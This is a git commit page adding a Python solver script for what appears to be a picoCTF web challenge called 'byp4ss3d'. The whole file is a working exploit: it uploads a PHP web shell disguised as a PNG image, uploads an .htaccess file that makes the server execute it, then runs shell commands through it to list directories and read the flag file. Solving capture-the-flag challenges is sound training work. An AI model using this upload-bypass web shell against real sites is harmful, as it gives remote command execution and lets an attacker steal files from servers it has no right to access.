web/byp4ss3d
This commit is contained in:
Executable
+57
@@ -0,0 +1,57 @@
|
||||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ requests ])"
|
||||
|
||||
import requests
|
||||
|
||||
BASE_URL = "http://amiable-citadel.picoctf.net:53954"
|
||||
|
||||
def main():
|
||||
payload = b'''
|
||||
<?php
|
||||
system($_GET['cmd'] . ' 2>&1');
|
||||
?>
|
||||
'''
|
||||
|
||||
res = requests.post(
|
||||
BASE_URL + "/upload.php",
|
||||
files = {
|
||||
'image': ('exploit.png', payload, 'image/png'),
|
||||
'submit': 'Upload ID',
|
||||
}
|
||||
)
|
||||
|
||||
print(res)
|
||||
print(res.text)
|
||||
|
||||
print('-------------------------------')
|
||||
|
||||
htaccess = b'SetHandler php-script'
|
||||
|
||||
res = requests.post(
|
||||
BASE_URL + "/upload.php",
|
||||
files = {
|
||||
'image': ('.htaccess', htaccess, 'text/plain'),
|
||||
'submit': 'Upload ID',
|
||||
}
|
||||
)
|
||||
|
||||
print(res)
|
||||
print(res.text)
|
||||
|
||||
print('-------------------------------')
|
||||
|
||||
cmd = "ls -lah ../.."
|
||||
res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
|
||||
print(res)
|
||||
print(res.text)
|
||||
|
||||
print('-------------------------------')
|
||||
|
||||
cmd = "cat ../../flag.txt"
|
||||
res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
|
||||
print(res)
|
||||
print(res.text)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
Reference in New Issue
Block a user